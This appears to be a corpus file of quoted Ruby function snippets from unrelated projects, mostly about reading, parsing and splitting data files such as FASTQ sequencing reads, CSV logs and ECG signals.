"def map_to_chunks(frames)\n frames.each_cons(1 + BONUS_LOOKAHEADS.max).to_a\n end",
"def read_files(year, month, path)\n array = [0, '', 100, '', 0, '', 100, 100, 100]\n month_name = Date::MONTHNAMES[month]\n link = \"#{path}_#{year}_#{month_name[0..2]}.txt\"\n file = CSV.read(link)\n loop_var, line_count = case_read_file(path, link)\n until loop_var > line_count\n high_temp_file_loop(loop_var, array, file)\n low_temp_file_loop(loop_var, array, file)\n humid_file_loop(loop_var, array, file)\n loop_var += 1\n end\n array\n end",
"def prepare_reads(base, map, fqgz0, *fqgzs0)\n\n fqgzs = [fqgz0] + fqgzs0\n\n bcs = Hash.new\n open(map, 'r').each do |line|\n bc, well = line.rstrip.split(',')\n bcs[bc] = well\n end\n \n bcl = bcs.keys.map!{|key| key.length}.sort.uniq[0]\n\n tso_pattern = '.'*options.umi_length + '.'*bcl + 'GG'\n\n #\n \n STDERR.puts \"#{`date`.strip}: Demultiplexing each raw sequence files...\"\n \n fqgz2csv0 = Hash.new\n fqgz2csv1 = Hash.new\n fqgz2base = Hash.new\n fqgzs.each do |fqgz|\n fqgz2csv0[fqgz] = get_temporary_path('strt.preprocess', 'csv', false)\n fqgz2csv1[fqgz] = get_temporary_path('strt.preprocess', 'csv', false)\n fqgz2base[fqgz] = get_temporary_path('strt.preprocess', 'base', false)\n end\n\n Parallel.map(fqgz2csv0.keys, in_processes: options.parallel) do |fqgz|\n cmds = [\n \"unpigz -c #{fqgz}\",\n \"#{fq1l_convert_command(options)}\",\n \"#{fq1l_count_command(options)} #{fqgz2csv0[fqgz]}\",\n \"fq1l match_5end#{grep_prefix_option(options)} #{tso_pattern}\",\n \"#{fq1l_count_command(options)} #{fqgz2csv1[fqgz]}\",\n \"fq1l annotate_index --first-cycle=#{options.umi_length+1} --last-cycle=#{options.umi_length+bcl}\",\n \"fq1l annotate_umi --first-cycle=1 --last-cycle=#{options.umi_length}\",\n \"fq1l sort_index#{coreutils_prefix_option}#{parallel_option(options)} --buffer-size=#{(options.maximum_memory/(fqgz2csv0.keys.size+1)).to_i}%\",\n \"fq1l demultiplex #{fqgz2base[fqgz]} #{map}\"\n ]\n cmds.insert(2, \"#{head_command(options)} -n #{options.reads}\") unless options.reads.nil?\n stats = Open3.pipeline(*cmds)\n stats.each_index do |i|\n raise \"Fail at process #{i}; #{stats[i]}; #{cmds[i]}\" unless stats[i].success? || (stats[i].signaled? && stats[i].termsig == 13)\n end\n end\n\n system \"fq1l sum_counts #{fqgz2csv0.values.join(' ')} > #{base}.count.step1.csv\"\n unlink_files(fqgz2csv0.values)\n \n system \"fq1l sum_counts #{fqgz2csv1.values.join(' ')} > #{base}.count.step2.csv\"\n unlink_files(fqgz2csv1.values)\n\n #\n \n (bcs.values + ['NA']).each do |well|\n\n STDERR.puts \"#{`date`.strip}: Finishing well #{well}...\"\n \n tmpfqgzs = fqgz2base.values.map {|base| \"#{base}.#{well}.fq.gz\"}\n csvs = Array.new(6) {|i| \"#{base}.#{well}.count.step#{i+3}.csv\"}\n \n pipeline(\"unpigz -c #{tmpfqgzs.join(' ')}\",\n \"#{fq1l_convert_command(options)}\",\n \"#{fq1l_count_command(options)} #{csvs[0]}\",\n \"#{fq1l_sort_command} --buffer-size=#{(options.maximum_memory/2).to_i}%\",\n \"fq1l exclude_duplicate\",\n \"#{fq1l_count_command(options)} #{csvs[1]}\",\n \"fq1l trim_3end_quality\",\n \"#{fq1l_count_command(options)} #{csvs[2]}\",\n \"fq1l trim_3end_primer#{coreutils_prefix_option}#{grep_prefix_option(options)}#{parallel_option(options)}\",\n \"#{fq1l_count_command(options)} #{csvs[3]}\",\n \"#{fq1l_sort_command} --buffer-size=#{(options.maximum_memory/2).to_i}%\",\n \"fq1l exclude_degenerate\",\n \"#{fq1l_count_command(options)} #{csvs[4]}\",\n \"fq1l trim_5end --minimum-length=#{options.minimum_length} #{tso_pattern}+\",\n \"#{fq1l_count_command(options)} #{csvs[5]}\",\n \"fq1l restore#{coreutils_prefix_option}\",\n \"pigz -c > #{base}.#{well}.fq.gz\")\n \n unlink_files(tmpfqgzs)\n \n end\n \n end",
"def file_array_parser\n @array_of_parse_files = []\n file_array.each do |file|\n File.open(\"text_files/#{file}\").readlines.each do |line|\n if line.include?(\"\\n\") # removes '\\n' (line breaker)\n @array_of_parse_files << [line.gsub!(/\\n/, '')]\n else\n @array_of_parse_files << [line]\n end \n end\n @array_of_parse_files \n end\n\nend",
"def stripe_read(striped_paths, size, offset, chunksize, read_length, ffi)\n\t\t\tstripes_count = striped_paths.count\n\t\t\t# Calculate Stripe number corresponding to offset in file\n\t\t\tchunks_till_offset_in_file = offset/chunksize\n\t\t\tstripe_at_offset = chunks_till_offset_in_file % stripes_count\n\n\t\t\tsize -= read_length\n\t\t\tread_buffer = \"\"\n\t\t\t# Calculate Offset in Stripe to read at\n\t\t\toffset_in_chunk_in_stripe = offset % chunksize\t#offset relative to a chunk \n\t\t\tchunk_till_offset_in_stripe = chunks_till_offset_in_file / stripes_count\n\t\t\toffset_in_stripe = (chunk_till_offset_in_stripe * chunksize) + offset_in_chunk_in_stripe\n\n\t\t\t# Calculate Size of data to read at offset in stripe\n\t\t\tsize_to_read_in_chunk = chunksize - offset_in_chunk_in_stripe\n\t\t\tsize_to_read_in_stripe = size > size_to_read_in_chunk ? size_to_read_in_chunk : size\n\t\t\t\n\t\t\t# Read data of calcalated size at offset in stripe\n\t\t\t::File.open(striped_paths[stripe_at_offset], \"r+\") do |file|\n\t\t\t\tfile.seek(offset_in_stripe, 0)\n\t\t\t\tread_buffer = file.read(size_to_read_in_stripe)\n\t\t\tend\n\t\t\tread_buffer\n\t\tend",
"def findSequenceFiles()\n # Assumption - 1 directory per lane\n fileList = Dir[\"*_sequence.txt\"]\n\n if fileList.size < 1\n raise \"Could not find sequence files in directory \" + Dir.pwd\n elsif fileList.size == 1\n @isFragment = true\n @sequenceFiles = fileList\n elsif fileList.size == 2\n @isFragment = false # paired end read\n @sequenceFiles = fileList\n else\n raise \"More than two sequence files detected, perhaps from different reads in directory \" + Dir.pwd\n end\n end",
"def read_lines\n lines = Array.new\n line = @file.gets\n tokens = line.scan(/[-+]?\\d*\\.?\\d+/)\n x1 = Integer(tokens[0])\n x2 = Integer(tokens[1])\n \n while not (x1==0 and x2==0)\n l = Line.new(x1,x2)\n lines.push(l)\n line = @file.gets\n tokens = line.scan(/[-+]?\\d*\\.?\\d+/)\n \n x1 = Integer(tokens[0])\n x2 = Integer(tokens[1])\n \n end\n \n return lines\n \n end",
"def read_fastq(filename)\r\n sequences = []\r\n qualities = []\r\n counter = 1 #Support variable to know what lines are needed to save\r\n current = \"seq\"\r\n File.foreach(filename) do |line|\r\n if counter % 2 == 0\r\n if current == \"seq\"\r\n sequences = sequences.concat([line.chomp])\r\n current = \"qual\"\r\n else\r\n qualities = qualities.concat([line.chomp])\r\n current = \"seq\"\r\n end\r\n end\r\n counter += 1\r\n end\r\n\r\n return [sequences, qualities]\r\nend",
"def process_build_errors(errors, error_file)\n error_count = 0\n if errors && errors.length > 0\n err_file = File.new(error_file, \"w\") if error_file\n begin\n msg, msg_num, source_line, mbr = nil, nil, nil, nil\n errors.to_s.each_line do |line|\n err_file.puts(line) if err_file\n if line =~ /^\\\\\\\\(?:Record #\\d+ - )?(.+) \\((\\d+)\\)/\n yield msg, mbr, source_line if msg && block_given?\n msg = $1\n msg_num = $2.to_i\n msg_template = DATA_LOAD_ERROR_CODES[msg_num]\n if msg_template\n re = Regexp.new(msg_template.gsub('%s', '(.+)'), Regexp::IGNORECASE)\n mbr = re.match(msg)[1]\n end\n error_count += 1\n else\n source_line = line\n yield msg, mbr, source_line if block_given?\n msg, msg_num, source_line, mbr = nil, nil, nil, nil\n end\n end\n yield msg, mbr, source_line if msg && block_given?\n ensure\n err_file.close if err_file\n end\n end\n log.warning \"There were #{error_count} build errors\" if error_count > 0\n error_count\n end",
"def makeLargeFiles(files, fileSizes)\n\t\tr = Random.new\n\t\ttotalLargeFiles = r.rand(LARGEFILES)\n\t\tlargeFiles = Array.new\n\t\tfor i in 1..totalLargeFiles\n\t\t\tfileNumber = r.rand(0..files.size-1)\n\t\t\tfile = files[fileNumber]\n\t\t\tif fileSizes[fileNumber] > 500000\n\t\t\t\t#log \"LargeFiles redo #{file}\"\n\t\t\t\tredo\n\t\t\tend\n\t\t\t#cmd = \"dd if=/dev/zero of=#{file} count=513 bs=1024 status=none\"\n\t\t\t#cmd = \"dd if=/dev/zero of=#{file} count=513 bs=1024 2&>1 >/dev/null\"\n\t\t\tcmd = \"dd if=/dev/zero of=#{file} count=513 bs=1024\"\n\t\t\t#log cmd\n\t\t\t`#{cmd} 2>&1 >/dev/null`\n\t\t\t#`#{cmd}`\n\t\t\tlargeFiles << file\n\t\t\tfileSizes[fileNumber] = 513*1024\n\t\tend\n\t\treturn largeFiles\n\tend",
"def outputs\n id_array = []\n reads.each do |read|\n id = \"s_#{self.lane}_#{read}_#{self.barcode_string}.fastq.gz\"\n id_array << id\n end\n id_array\n end",
"def by_line_length\n a = File.readlines(file_name)\n while b = a.shift\n puts b if b.length >= 250\n end\n end",
"def detect_segment_errors(segment, segment_start, segment_end) #collapse_start\n segment_length = segment.length\n averaged_segment = Array.new(segment_length)\n local_maxes = Array.new\n\n # Smooth the data by taking the averages\n for i in 0...segment_length\n if i == 0\n averaged_segment[i] = segment.slice(0,3).inject(:+).to_f / 3.0\n elsif i == 1\n averaged_segment[i] = segment.slice(0,4).inject(:+).to_f / 4.0\n elsif i == segment_length-1\n averaged_segment[i] = segment.slice(segment_length-3, 3).inject(:+).to_f / 3.0\n elsif i == segment_length-2\n averaged_segment[i] = segment.slice(segment_length-4, 4).inject(:+).to_f / 4.0\n else\n averaged_segment[i] = segment.slice(i-2, 4).inject(:+).to_f / 4.0\n end\n end\n\n # Find all the local maxes in the data, that can correspond to qrs segments or smaller local maxes\n j = 0\n while j < segment_length\n current = averaged_segment[j]\n local_max = true\n\n if (current - BASELINE_VALUE) > 20\n starting = [j-10, 0].max\n ending = [j+10, segment_length].min\n for k in starting...ending\n if averaged_segment[k] > current\n local_max = false\n break\n end\n end\n\n if local_max\n if (current - 512) > 250\n local_maxes.push({ index: j, type: 'qrs' })\n else\n local_maxes.push({ index: j, type: 'small' })\n end\n j += 10\n end\n end\n j += 1\n end\n\n distances = Array.new\n flutters = Array.new\n w = 0\n\n # Find the distances between qrs segments\n # Find the number of small local maxes in between qrs segments (corresponding to atrial flutters)\n while w < local_maxes.length - 1\n current = local_maxes[w]\n if current[:type] == 'qrs'\n idx = w+1\n counter = 0\n\n while idx < local_maxes.length\n if local_maxes[idx][:type] == 'qrs'\n distances.push({\n start: current[:index],\n stop: local_maxes[idx][:index],\n distance: local_maxes[idx][:index] - current[:index]\n })\n if counter >= 4\n flutters.push({\n start: current[:index],\n stop: local_maxes[idx][:index],\n distance: local_maxes[idx][:index] - current[:index]\n })\n end\n break;\n end\n\n counter += 1\n idx += 1\n end\n\n w = idx\n else\n w += 1\n end\n end\n\n max_distance = distances.present? ? distances.max_by { |obj| obj[:distance] }[:distance] : 0\n min_distance = distances.present? ? distances.min_by { |obj| obj[:distance] }[:distance] : 0\n long_distances = Array.new\n if max_distance - min_distance > 75\n long_distances = distances.select { |obj| obj[:distance] > max_distance-25 }\n long_distances = long_distances.reduce([]) do |memo, val|\n last = memo.last\n if last\n if last[:stop] == val[:start]\n last[:stop] = val[:stop]\n last[:distance] = last[:distance] + val[:distance]\n memo[-1] = last\n\n memo\n else\n memo.push(val)\n end\n else\n [val]\n end\n end\n end\n\n long_distances.each do |dist_obj|\n signal = segment.slice(dist_obj[:start], dist_obj[:distance])\n\n StreamAlert.create({\n signal: signal,\n start_time: Time.at(segment_start.to_f + dist_obj[:start]*MS_PER_SAMPLE/1000.0),\n end_time: Time.at(segment_start.to_f + dist_obj[:stop]*MS_PER_SAMPLE/1000.0),\n alert: 'Sinus Arrythmia',\n ecg_stream_id: self.id\n })\n end\n\n flutters.each do |flutter_obj|\n signal = segment.slice(flutter_obj[:start], flutter_obj[:distance])\n\n StreamAlert.create({\n signal: signal,\n start_time: Time.at(segment_start.to_f + flutter_obj[:start]*MS_PER_SAMPLE/1000.0),\n end_time: Time.at(segment_start.to_f + flutter_obj[:stop]*MS_PER_SAMPLE/1000.0),\n alert: 'Atrial Flutter',\n ecg_stream_id: self.id\n })\n end\n end",
"def find_to_bigs(levels=[\"0\"],up_to=300)\n\tarr,names = find_files(levels,up_to)\n\tto_bigs = []\n\t(0...arr.size).each do |i|\n\t\tFile.open(arr[i],\"r\"){|file|\n\t\t\tfile.each_line do |line|\n\t\t\t\tif (line.chomp == \"OUTPUT_TOO_BIG\")\n\t\t\t\t\tputs names[i]\n\t\t\t\t\tto_bigs << names[i]\n\t\t\t\tend\n\t\t\t\tbreak\n\t\t\tend\n\t\t}\n\tend\n\treturn to_bigs\nend",
"def fasta_with_lengths(fasta_fn)\n tmp_file = register_new_tempfile('positive_peaks_formatted.fa')\n File.open(fasta_fn){|f|\n f.each_line.slice_before(/^>/).each{|hdr, *lines|\n seq = lines.map(&:strip).join\n tmp_file.puts \"#{hdr.strip}:#{seq.size}\"\n tmp_file.puts seq\n }\n }\n tmp_file.close\n tmp_file.path\nend",
"def gen_input_files(fileprefix, nbr_files, nbr_floors, rate, max_time)\r\n nbr_files.times do |n|\r\n filename = fileprefix + (\"%.3d\" % n) + '.in'\r\n gen_input_file(filename, nbr_floors, rate, max_time)\r\n end\r\n end",
"def mm_allreads(cigarstring, samread, posdiff)\n\t\tcount = 0\n\t\tcigarstring.split(\",\").each do |cig|\n\t\t\tcigar = Cigar.find_by(id: cig)\n\t\t\tif samread.key?(cigar.read_id.to_s) == true\n\t\t\t\tplayerpos = cigar.pos.to_i + posdiff\n\t\t\t\tif samread[cigar.read_id.to_s][:cigar] != cigar.data.to_s\n\t\t\t\t\tcount = count + 1\n\t\t\t\telsif samread[cigar.read_id.to_s][:bwapos].to_i != playerpos\n\t\t\t\t\tcount = count + 1\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\t\treturn count\n\tend",
"def 500_files(input)\n # naive solution is to flatten and sort\n\n \nend",
"def divide_to_slices(array, slice_count)\n slice_size = ((array.length.to_f / slice_count).ceil).to_i\n return array.each_slice(slice_size)\n end",
"def bucketized_alignment\n # split reads into buckets according to their size and err_rate\n @buckets = bucketize(@err_rate)\n\n # perform alignment on each bucket\n @buckets.reverse_each do |lower, upper, mismatches|\n @names.set_bucket(lower, upper)\n mapped, unmapped = align(\n @ref, @ref_base, @software,\n { annotation: @annotation,\n tophat_aligner: @tophat_aligner,\n mismatches: mismatches\n }\n )\n @mapped_bams << mapped\n @unmapped_bams << unmapped\n @max_mismatches = [@max_mismatches, mismatches].max\n end\n\n # merge alignments\n @names.unset_bucket\n unbucketize(@mapped_bams, @names.get('mapped_merged'))\n unbucketize(@unmapped_bams, @names.get('unmapped_merged'))\n end",
"def test_read_file_many_blocks\r\n hash_calc = Minitest::Mock.new('test_hash_calculator')\r\n block_checker = Minitest::Mock.new('test_block_checker')\r\n account_tracker = Minitest::Mock.new('account_tracker')\r\n def block_checker.read_next_line; \"1|2|3|4|5|6\"; end\r\n def block_checker.parse(string, char); [\"1\",\"2\",\"3\",\"4\",\"5\",\"6\"]; end\r\n output = \"Line 0: Too many '|' in the block '1|2|3|4|5|6'\"\r\n assert_equal output, @g.read_file(hash_calc, block_checker, account_tracker)\r\n end",
"def read_file (length_of_row, length_of_col, file_name)\n @row_max = length_of_row\n @col_max = length_of_col\n file = File.open(file_name, 'r')\n file.each_line do |line|\n line = line.strip.split(' ').map(&:to_i)\n @picture << line\n end\n self.labeling\n self.print_array(@picture)\n puts \"--------------------------------------\"\n self.print_array(@final_array)\n end",
"def read_file\n \t@readin = []\n file = File.open(@filename[@file_count], 'r')\n\t @readin = file.each.to_a\n\t # chop off the escaped characters (in this case: \\r\\n)\n @readin.map! {|s| s.chomp}\n # increment the file count\n @file_count += 1\n file.close\n # determine which file was read in\n # the files either have a \"W\" (for power) or \"Wh\" as the first line\n \tif @readin[0] =~ /Wh/\n \t\tparse_energy\n \telse @readin[0] =~ /W/\n \t\tparse_power\n \tend\n end",
"def get_record_blocks\n\n blocks = []\n current_block = nil\n\n File.readlines(@file).each do |l|\n\n # start of a new aragorn result\n if l =~ /^Location \\[(\\d+),(\\d+)\\]$/\n\n if current_block\n blocks << parse_block(current_block)\n current_block = []\n else \n current_block = Array.new\n end\n end\n\n if current_block\n current_block << l\n end \n\n end\n unless current_block.nil?\n blocks << parse_block(current_block)\n end\n\n return blocks\n end",
"def calculate_max_seqs\n file_summaries.map(&:seqs).max\n end",
"def findFastqFiles()\n @read1FileList = Dir[\"*_R1_*.fastq.gz\"]\n @read2FileList = Dir[\"*_R2_*.fastq.gz\"]\n\n if @read1FileList == nil || @read1FileList.length < 1\n raise \"Did not find any fastq files for read 1\"\n else\n @read1FileList.sort! # Sort all the filenames by segment number\n end\n\n if @mode.eql?(\"paired\") && (@read2FileList == nil || @read2FileList.length < 1) \n raise \"Did not find any fastq files for read 2 for paired-end mode\"\n end\n\n if @read2FileList != nil && @read2FileList.length >= 1\n @read2FileList.sort! # Sort the read 2 fastq filenames by segment number\n end\n end",
"def handle_bed_errors(bed_fn, bed_errors)\r\n nr_bases = bed_errors[0]\r\n bed_lines_size = bed_errors[1]\r\n bad_lines = bed_errors[2]\r\n \r\n rc = 0\r\n if bad_lines > 0 \r\n if bad_lines < bed_lines_size\r\n rc = 0\r\n flash.now[:notice] = 'WARNING: ' + bad_lines.to_s + ' invalid bed format lines found in file and ignored'\r\n else\r\n rc = -1\r\n flash[:error] = 'ERROR: No valid bed format lines found in file: ' + bed_fn\r\n end\r\n end\r\n \r\n if nr_bases > DesignQuery::MAX_BASES\r\n rc = -2\r\n flash[:error] = 'ERROR: Genomic space of ' + nr_bases.to_s + ' is too large - please limit to ' + DesignQuery::MAX_BASES\r\n elsif bed_lines_size > DesignQuery::MAX_BED_LINES\r\n rc = -3\r\n flash[:error] = \"ERROR: Too many lines in file - please limit to #{DesignQuery::MAX_BED_LINES} lines\"\r\n end\r\n return rc\r\n end",
"def createAvailable(split) \n start = CHUNKS*2+3\n available = []\n \n while(start < split.length)\n available.push split[start].chomp.to_i\n start += CHUNKS+1\n end\n return available\nend",
"def parse_file\n parsed_result_blocks = get_record_blocks\n\n gff_array = []\n if !parsed_result_blocks.empty?\n parsed_result_blocks.each do |b|\n gff_array << line_to_gff(b)\n end\n end\n return gff_array\n end",
"def ranges_of_offfsets_for_size(number_of_items, chunk_size)\n raise ArgumentError, \"Chunk size should be > 0, was #{chunk_size}\" unless chunk_size > 0\n split_range_into_subranges_of(range_for_size_of(number_of_items), chunk_size)\n end",
"def folding_ranges(filename); end",
"def open_fastq_sub_output_files\n return if @stats_only\n if @pass_sub_filename.nil? && @reject_sub_filename.nil?\n # no files open\n @pass_sub = nil\n @reject_sub = nil\n else\n # split the reads that passed and the reads that failed\n # the quality filter into separate files; if either one\n # of the file names was not specified then discard the\n # corresponding reads\n unless @pass_sub_filename.nil?\n STDERR.puts \"Opening #{make_temp_filename(@pass_sub_filename)} for subfile pass filter FASTQ output.\" if @verbose\n @pass_sub = open_fastq_output(make_temp_filename(@pass_sub_filename))\n end\n unless @reject_sub_filename.nil?\n STDERR.puts \"Opening #{make_temp_filename(@reject_sub_filename)} for subfile reject filter FASTQ output.\" if @verbose\n @reject_sub = open_fastq_output(make_temp_filename(@reject_sub_filename))\n end\n end\n end",
"def run_split(input_file, prefix, o={})\n result = get_split_files(input_file, prefix)\n if result.size > 0\n puts \"[run_split] result exists. skipping...\"\n return result\n end\n o[:suf_len] ||= 5\n if o[:k]\n o[:line_bytes] = (File.size(input_file) / o[:k].to_f).to_i\n o[:suf_len] = Math.log10(o[:k]).ceil\n end\n #split argument\n arg = if o[:line_bytes]\n \"-C #{o[:line_bytes]}\"\n elsif o[:lines]\n \"-l #{o[:lines]}\"\n end\n log = `split #{arg} -d -a #{o[:suf_len]} #{input_file} #{prefix}`\n if log.scan(/[a-z]/).size > 0\n puts \"[run_split] error[#{log}]\"\n return nil\n end\n get_split_files(input_file, prefix)\nend",
"def split_array(array, number)\n size = number\n \nend",
"def split_data_into_files(datafile)\n datafiles = []\n output = NIL\n File.open(datafile) do |file| \n counter = 1 \n something_was_written = FALSE\n while line = file.gets \n # parse lines and break into different files at #\n if( line.match( /^\\s*Model/ ) )\n if (something_was_written && output) \n output.close\n output = NIL\n end\n something_was_written = FALSE\n else \n if (!something_was_written) \n outputfile_name = datafile.gsub(/\\.txt/, \"-\" + counter.to_s + \".functionfile.txt\")\n counter +=1\n output = File.open(outputfile_name, \"w\") \n datafiles.push(outputfile_name)\n end\n # check if line matches @n_nodes digits\n if (line.match( /^\\s*f\\d*/) )\n output.puts line\n something_was_written = TRUE\n end\n end\n end \n file.close\n if (output) \n output.close\n end\n end\n datafiles\nend",
"def split_data_into_files(datafile)\n datafiles = []\n output = NIL\n File.open(datafile) do |file| \n counter = 1 \n something_was_written = FALSE\n while line = file.gets \n # parse lines and break into different files at #\n if( line.match( /^\\s*Model/ ) )\n if (something_was_written && output) \n output.close\n output = NIL\n end\n something_was_written = FALSE\n else \n if (!something_was_written) \n outputfile_name = datafile.gsub(/\\.txt/, \"-\" + counter.to_s + \".functionfile.txt\")\n counter +=1\n output = File.open(outputfile_name, \"w\") \n datafiles.push(outputfile_name)\n end\n # check if line matches @n_nodes digits\n if (line.match( /^\\s*f\\d*/) )\n output.puts line\n something_was_written = TRUE\n end\n end\n end \n file.close\n if (output) \n output.close\n end\n end\n datafiles\nend",
"def readWeights\n\ti=0\n\tFile.open(RISKS).each_line { |line|\n\t\tns = line.split\n\t\t@risks[ns[0]] = ns[1].to_i\n\t\ti = i+1\n\t}\n\tFile.open(SYS_FUN).each_line { |line|\n\t\tns = line.split\n\t\t@frisk[ns[0]] = ns[1].to_i\n\t\ti = i+1\n\t}\n\treturn i\nend",
"def read_array_fields(cls, io_offset, length, signature)\n @io.seek io_offset # Move to the field data\n @io.read_bytes TYPE_SIZES_MAP[signature] * length\n end",
"def generate_failure_lines(array_file_content)\n array_details = Array.new\n array_get = false\n index = 0\n array_file_content.each do |line|\n index += 1 if array_get and line.match(Regexp.new(\"#{index + 2}\\\\)\"))\n array_get = true if line.match(Regexp.new(\"#{index + 1}\\\\)\"))\n if array_get and line.match(/assertions/).nil?\n array_details[index] = Array.new if array_details[index].nil?\n next if array_details[index].length == 0 and line.match(/[0-9]\\)/).nil?\n array_details[index] << line\n end\n end\n (0..index).to_a.each do |arr_index|\n html_details, array_details = generate_failure_or_error_line(array_details, arr_index)\n end\n html_details\n end",
"def slices(num_slices)\n array_of_slices = []\n each_slice(length / num_slices) { |s| array_of_slices << s }\n array_of_slices\n end",
"def each\n with_separate_read_io do | iterable |\n reading_lens = Obuf::Lens.new(iterable)\n @size.times { yield(reading_lens.recover_object) }\n end\n end",
"def validate_stats\n seq_total = @seq_stats[\"Total Reads\"].to_i\n seq_pf = @seq_stats[\"Post-Filter Reads\"].to_i\n die \"seq_stats_file: missing total\" if @seq_stats[\"Total Reads\"].nil?\n die \"seq_stats_file: missing post-filter read count\" if @seq_stats[\"Post-Filter Reads\"].nil?\n die(\"seq_stats_file: #{seq_pf} post-filter reads > \" +\n \"#{seq_total} total reads\") if seq_pf > seq_total\n\n # check mapped-read statistics\n if @barcodes.empty? && (@eland || @bwa)\n mapper_pf = @mapper_pf_stats[\"Total Reads\"].to_i\n die(\"#{seq_pf} post-filter reads != \" +\n \"#{mapper_pf} mapped post-filter reads\") if seq_pf != mapper_pf\n if not @no_rejects\n mapper_reject = @mapper_reject_stats[\"Total Reads\"].to_i\n mapper_total = mapper_pf + mapper_reject\n die(\"#{seq_total} sequenced reads != #{mapper_total} mapped reads\") if\n seq_total != mapper_total\n end\n end\n\n # check barcode statistics\n #if !@barcodes.empty?\n # barcode_pf = count_and_validate_barcodes(:post_filter, :mapper_pf_stats)\n # die(\"#{seq_pf} post-filter reads != \" +\n # \"#{barcode_pf} barcoded post-filter reads\") if seq_pf != barcode_pf\n # if not @no_rejects\n # barcode_reject = count_and_validate_barcodes(:rejected, :mapper_reject_stats)\n # barcode_total = barcode_pf + barcode_reject\n # die(\"#{seq_total} sequenced reads != #{barcode_total} barcoded reads\") if\n # seq_total != barcode_total\n # end\n #end\n end",
"def get_lines\n lines = []\n read_file.each_line{|l| lines << l.chomp }\n @total_lines = lines.shift.to_i\n lines\n end",
"def split() File.split(@path).map {|f| self.class.new(f) } end",
"def split_into_parts(*sizes); end",
"def read_singletons(singletons, read_length)\n\t\tsingle_reads = {}\n\t\t\n\t\tFile.open(singletons, 'r').readlines.each do |line|\n \n \t\tline = line.strip.split(/\\s+/)\n \t\tqname, flag, chr, start = line[0..3] \t\n \t\tflag.to_i & 0x10 > 0 ? strand = -1 : strand = 1\n \t\tcigar = line[5]\n\t\t\tdistance = genomic_mappinglength(cigar, read_length)\n\t\t\t\n\t\t\tif distance != false\n\t\t\t\tstrand == 1 ? stop = start + distance : stop = start - distance\n\t\t\t\tsingle_reads[qname] = [chr, start, stop, strand]\n\t\t\tend\n\t\tend\n\t\tsingle_reads\n\tend",
"def readArray(hadError)\n if (hadError != nil)\n hadError[0] = false\n end\n arrayList = Array.new\n endMarker = Array.new\n endMarker[0] = false\n while true\n newString = readString(endMarker, hadError)\n if (newString == nil)\n if (hadError != nil) \n hadError[0] = true\n end\n break\n end\n if (endMarker[0])\n break\n end\n arrayList << newString\n end\n return arrayList\n end",
"def process_file(offset = 0)\n batch = Array.new\n idx = 0\n IO.readlines(@logfile).each do |line|\n if (idx += 1) <= offset\n next\n end\n\n m = line.match(@regex)\n if !m\n $stderr.puts \"Dropping logline '#{line}' because it does not match the parsing regex: #{@regex}\"\n next\n end\n\n if batch.size >= @batch_size\n enqueue_batch(batch.dup)\n batch.clear()\n end\n\n batch.push(m)\n end\n\n if batch.size > 0\n enqueue_batch(batch)\n end\n\n return idx\n end",
"def read_file_to_arr(path)\n ret = []\n File.open(path, \"r\") do |f|\n f.each_line do |line|\n ret << line.split(\" \").map { |s| s.to_i}\n end\n end\n return ret\nend",
"def read_multi(names)\n names.map do |name|\n read(name)\n end\n end",
"def array_statistics(files_array)\n file_count = 0; line_count = 0; loc_count = 0;\n \n files_array.collect {|f| file_statistics(f)}.each do |stats|\n file_count += 1\n line_count += stats[:line_count]\n loc_count += stats[:loc_count]\n end\n \n {\n :file_count => file_count,\n :line_count => line_count,\n :loc_count => loc_count,\n :class_length => file_count == 0 ? 0 : loc_count / file_count\n }\n end",
"def runMulFrSeq(filename)\n\t\tfiles=[]\n\t\tbegin\n\t\t\tfile = File.open(filename)\n\t\trescue\n\t\t\t$stderr.printf \"%scannot open file '%s' for reading!\\n\",$err,filename\n\t\t\texit 1\n\t\tend\n\n\t\tstartNewFile=true\n\t\toldFile=tmpf=nil\n\t\twhile line=file.gets\n\n\t\t\t# ---- only whitespace in the line?\n\t\t\tif line.split(\" \").length<1\n\t\t\t\tstartNewFile=true\n\t\t\telse\n\t\t\t\tif startNewFile\n\t\t\t\t\toldFile.flush if oldFile\n\t\t\t\t\ttmpf=oldFile=Tempfile.new(\"eplot\")\n\t\t\t\t\tfiles.push(tmpf)\n\t\t\t\t\tstartNewFile=false\n\t\t\t\tend\n\t\t\t\ttmpf.puts line\n\t\t\tend\n\t\tend\n\t\tif tmpf\n\t\t\ttmpf.flush\n\t\telse\n\t\t\t$stderr.printf \"%sFile '%s' is empty!\\n\",$err,filename\n\t\t\texit 1\n\t\tend\n\t\tfile.close\n\n\t\t# ---- Call it as if we had multiple files\n\t\tremoveDummyTitles(files.length)\n\t\trunMulFrMulOpenedFiles(files)\n\t\tfiles.each { |f| f.close }\n\tend",
"def parse_files(options)\n files = options.files\n files = [\".\"] if files.empty?\n\n file_list = normalized_file_list(options, files, true, options.exclude)\n\n return [] if file_list.empty?\n\n jobs = SizedQueue.new(number_of_threads * 3)\n workers = []\n file_info = []\n file_info_lock = Mutex.new\n\n Thread.abort_on_exception = true\n @stats = Stats.new(file_list.size, options.verbosity)\n @stats.begin_adding(number_of_threads)\n\n # Create worker threads.\n number_of_threads.times do\n thread = Thread.new do\n while (filename = jobs.pop)\n @stats.add_file(filename)\n content = read_file_contents(filename)\n top_level = ::RDoc::TopLevel.new filename\n\n parser = ::RDoc::Parser.for(top_level, filename, content, options,\n @stats)\n result = parser.scan\n\n file_info_lock.synchronize do\n file_info << result\n end\n end\n end\n workers << thread\n end\n\n # Feed filenames to the parser worker threads...\n file_list.each do |filename|\n jobs << filename\n end\n workers.size.times do\n jobs << nil\n end\n\n # ...and wait until they're done.\n workers.each do |thread|\n thread.join\n end\n\n @stats.done_adding\n\n file_info\n end",
"def get_total_time_list(filename)\n to_return = []\n lines = File.open(filename, \"rb\") {|f| f.read.split(/\\n+/)}\n lines.each do |line|\n kernel_start = 0.0\n kernel_end = 0.0\n # The lines we're interested in shouldn't contain any letters, just numbers\n next if line =~ /[a-zA-Z]/\n values = line.split.map {|v| v.to_f}\n to_return << [values[0], values[3]]\n end\n to_return\nend",
"def parse_remaining_files; end",
